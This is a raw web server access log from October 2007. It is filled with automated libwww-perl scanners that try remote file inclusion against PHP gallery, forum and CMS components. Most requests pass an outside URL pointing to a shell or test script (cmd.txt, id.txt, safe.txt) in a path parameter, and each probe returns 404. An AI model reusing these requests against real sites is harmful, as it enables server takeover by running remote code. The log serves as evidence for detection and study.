62.67.244.181 - - [21/Oct/2007:17:47:47 -0700] "GET /logs/access_070826.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
194.0.200.9 - - [21/Oct/2007:17:47:51 -0700] "GET /logs/access_071008.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.0.200.9 - - [21/Oct/2007:17:47:51 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.67.244.181 - - [21/Oct/2007:17:47:53 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
62.67.244.181 - - [21/Oct/2007:17:47:53 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
194.0.200.9 - - [21/Oct/2007:17:48:10 -0700] "GET /logs/access_070625.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.114.104.23 - - [21/Oct/2007:17:48:27 -0700] "GET /index1.php?x=http://www.heroesofsand.110mb.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
201.216.236.100 - - [21/Oct/2007:17:48:34 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:48:34 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:48:34 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:48:36 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:48:36 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:48:36 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.199.90.37 - - [21/Oct/2007:17:49:08 -0700] "GET /logs/access_070910.log//modules/agendax/addevent.inc.php?agendax_path=http://www.3002.net/gallery/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
65.199.90.37 - - [21/Oct/2007:17:49:16 -0700] "GET /logs/access_071008.log//modules/agendax/addevent.inc.php?agendax_path=http://www.3002.net/gallery/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.21.152.2 - - [21/Oct/2007:17:49:57 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://124.0.201.20/bbs000/cmdhtml.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.152.222.4 - - [21/Oct/2007:17:50:54 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.flylink.psi.br/arquivos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.152.222.4 - - [21/Oct/2007:17:50:54 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.flylink.psi.br/arquivos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.54.72.151 - - [21/Oct/2007:17:52:24 -0700] "GET /logs/access_070826.log/phpwcms/index.php?id=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:53:37 -0700] "GET /logs/access_070826.log//stats/modules/My_eGallery/index.php?basepath=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:53:40 -0700] "GET //stats/modules/My_eGallery/index.php?basepath=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:53:43 -0700] "GET /logs//stats/modules/My_eGallery/index.php?basepath=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [21/Oct/2007:17:53:44 -0700] "GET /logs/scripts.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.152.222.4 - - [21/Oct/2007:17:54:06 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.flylink.psi.br/arquivos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.152.222.4 - - [21/Oct/2007:17:54:06 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.flylink.psi.br/arquivos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.67.244.181 - - [21/Oct/2007:17:55:17 -0700] "GET /logs/access_070625.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
64.21.152.2 - - [21/Oct/2007:17:55:25 -0700] "GET /logs/access_071008.log//components/com_forum/download.php?phpbb_root_path=http://124.0.201.20/bbs000/cmdhtml.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.21.152.2 - - [21/Oct/2007:17:55:26 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://124.0.201.20/bbs000/cmdhtml.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.21.152.2 - - [21/Oct/2007:17:55:52 -0700] "GET /logs/access_071008.log//components/com_forum/download.php?phpbb_root_path=http://124.0.201.20/bbs000/cmdhtml.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
196.38.88.57 - - [21/Oct/2007:17:55:58 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ericsson-ringtones.com/ringtones-l5? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.246.77.175 - - [21/Oct/2007:17:56:26 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.175 - - [21/Oct/2007:17:56:26 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.175 - - [21/Oct/2007:17:56:27 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.175 - - [21/Oct/2007:17:56:27 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.175 - - [21/Oct/2007:17:56:27 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.calebsfunzone.com/editor/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.175 - - [21/Oct/2007:17:56:27 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.calebsfunzone.com/editor/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.151.228.18 - - [21/Oct/2007:17:59:52 -0700] "GET //Gallery/displayCategory.php?basepath=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.67.230.70 - - [21/Oct/2007:17:59:53 -0700] "GET /logs/access_071008.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.glt.petos.net/backupdb/kidna? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.151.228.18 - - [21/Oct/2007:17:59:53 -0700] "GET //Gallery/displayCategory.php?basepath=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.67.230.70 - - [21/Oct/2007:17:59:53 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.glt.petos.net/backupdb/kidna? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.67.230.70 - - [21/Oct/2007:17:59:54 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.glt.petos.net/backupdb/kidna? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.18.240.66 - - [21/Oct/2007:17:59:56 -0700] "GET /logs/access_070826.log/index1.php?p=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.30.216.109 - - [21/Oct/2007:17:59:57 -0700] "GET /logs/access_071001.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
147.83.2.40 - - [21/Oct/2007:17:59:59 -0700] "GET /logs/access_071008.log/main.php?inc=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
147.83.2.40 - - [21/Oct/2007:18:00:13 -0700] "GET /logs/access_070910.log/main.php?inc=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.67.230.70 - - [21/Oct/2007:18:00:16 -0700] "GET /logs/access_070625.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.glt.petos.net/backupdb/kidna? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.192.85.39 - - [21/Oct/2007:18:00:48 -0700] "GET /logs/access_071008.log/inc.php?inc=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.180.250.121 - - [21/Oct/2007:18:00:55 -0700] "GET /logs/access_070903.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
82.192.85.39 - - [21/Oct/2007:18:01:43 -0700] "GET /logs/access_070910.log/inc.php?inc=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.147.211.197 - - [21/Oct/2007:18:01:55 -0700] "GET /logs/access_070820.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.237.222.54 - - [21/Oct/2007:18:02:05 -0700] "GET /logs/access_070826.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://c0cac0larul3z.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:18:02:35 -0700] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:18:02:35 -0700] "GET //components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:18:02:55 -0700] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:18:03:00 -0700] "GET //components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:18:03:06 -0700] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:18:03:06 -0700] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:18:03:11 -0700] "GET //components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:18:03:12 -0700] "GET //components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.152.222.4 - - [21/Oct/2007:18:03:55 -0700] "GET /logs/index2.php?content=http://www.flylink.psi.br/arquivos/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.152.222.4 - - [21/Oct/2007:18:03:56 -0700] "GET /index2.php?content=http://www.flylink.psi.br/arquivos/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
196.38.88.57 - - [21/Oct/2007:18:05:38 -0700] "GET /logs/access_071008.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ericsson-ringtones.com/ringtones-l5? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
196.38.88.57 - - [21/Oct/2007:18:05:38 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ericsson-ringtones.com/ringtones-l5? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
196.38.88.57 - - [21/Oct/2007:18:06:04 -0700] "GET /logs/access_070625.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ericsson-ringtones.com/ringtones-l5? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:18:06:39 -0700] "GET /logs/access_071001.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:18:06:39 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:18:06:39 -0700] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:18:06:48 -0700] "GET /logs/access_071008.log/index.php?loc=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:18:06:48 -0700] "GET /index.php?loc=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:18:06:49 -0700] "GET /logs/index.php?loc=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.7.50 - - [21/Oct/2007:18:06:56 -0700] "GET /logs/access_071001.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [21/Oct/2007:18:06:56 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [21/Oct/2007:18:06:57 -0700] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:18:07:38 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.194.124.84 - - [21/Oct/2007:18:08:04 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.tryon.pagebr.com/fei/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.93.203.42 - - [21/Oct/2007:18:08:06 -0700] "GET /logs/access.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.194.124.84 - - [21/Oct/2007:18:08:09 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.tryon.pagebr.com/fei/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.194.124.84 - - [21/Oct/2007:18:08:20 -0700] "GET /logs/access_071008.log//components/com_forum/download.php?phpbb_root_path=http://www.tryon.pagebr.com/fei/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
213.194.124.84 - - [21/Oct/2007:18:08:21 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://www.tryon.pagebr.com/fei/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
209.62.7.50 - - [21/Oct/2007:18:08:23 -0700] "GET /logs/access.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.25.197.121 - - [21/Oct/2007:18:08:30 -0700] "GET /logs/access.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.75.162.34 - - [21/Oct/2007:18:08:30 -0700] "GET /logs/access.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.25.197.121 - - [21/Oct/2007:18:08:30 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.75.162.34 - - [21/Oct/2007:18:08:30 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.25.197.121 - - [21/Oct/2007:18:08:30 -0700] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.75.162.34 - - [21/Oct/2007:18:08:31 -0700] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.237.222.54 - - [21/Oct/2007:18:09:07 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://muold.4fungames.com.br/cmdz.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.25.197.127 - - [21/Oct/2007:18:09:19 -0700] "GET /logs/access_071001.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.25.197.127 - - [21/Oct/2007:18:09:19 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.25.197.127 - - [21/Oct/2007:18:09:20 -0700] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.118.244 - - [21/Oct/2007:18:09:23 -0700] "GET /logs/access_070826.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rcee.pl/administrator/components/com_trash/.../.inclusion/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.118.244 - - [21/Oct/2007:18:09:23 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rcee.pl/administrator/components/com_trash/.../.inclusion/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.118.244 - - [21/Oct/2007:18:09:23 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rcee.pl/administrator/components/com_trash/.../.inclusion/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.25.197.121 - - [21/Oct/2007:18:09:24 -0700] "GET /logs/access_071001.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.75.162.34 - - [21/Oct/2007:18:09:24 -0700] "GET /logs/access_071001.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
206.248.149.62 - - [21/Oct/2007:18:10:21 -0700] "GET /logs/access_071008.log/auto.php?inc=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.25.197.127 - - [21/Oct/2007:18:11:09 -0700] "GET /logs/access.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
78.129.138.76 - - [21/Oct/2007:18:11:15 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://nogrod.ifrance.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
78.129.138.76 - - [21/Oct/2007:18:11:15 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://nogrod.ifrance.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
78.129.138.76 - - [21/Oct/2007:18:11:16 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://nogrod.ifrance.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
78.129.138.76 - - [21/Oct/2007:18:11:16 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://nogrod.ifrance.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
216.151.138.48 - - [21/Oct/2007:18:11:39 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:18:11:44 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:18:12:00 -0700] "GET /logs/access_070826.log/wordtube/wordtube-button.php?wpPATH=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.75.162.34 - - [21/Oct/2007:18:12:06 -0700] "GET /logs/access_071001.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.162.34 - - [21/Oct/2007:18:12:06 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.162.34 - - [21/Oct/2007:18:12:06 -0700] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:18:12:12 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:18:12:12 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:18:12:20 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.46.92.16 - - [21/Oct/2007:18:12:25 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR \t3.0.04506.30)" "www.galf.org"
62.75.162.34 - - [21/Oct/2007:18:12:51 -0700] "GET /logs/access_070826.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:18:13:00 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.151.138.48 - - [21/Oct/2007:18:13:00 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.10.167.2 - - [21/Oct/2007:18:13:08 -0700] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.10.167.2 - - [21/Oct/2007:18:13:08 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.10.167.2 - - [21/Oct/2007:18:13:09 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.10.167.2 - - [21/Oct/2007:18:13:10 -0700] "GET /logs/access_070820.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
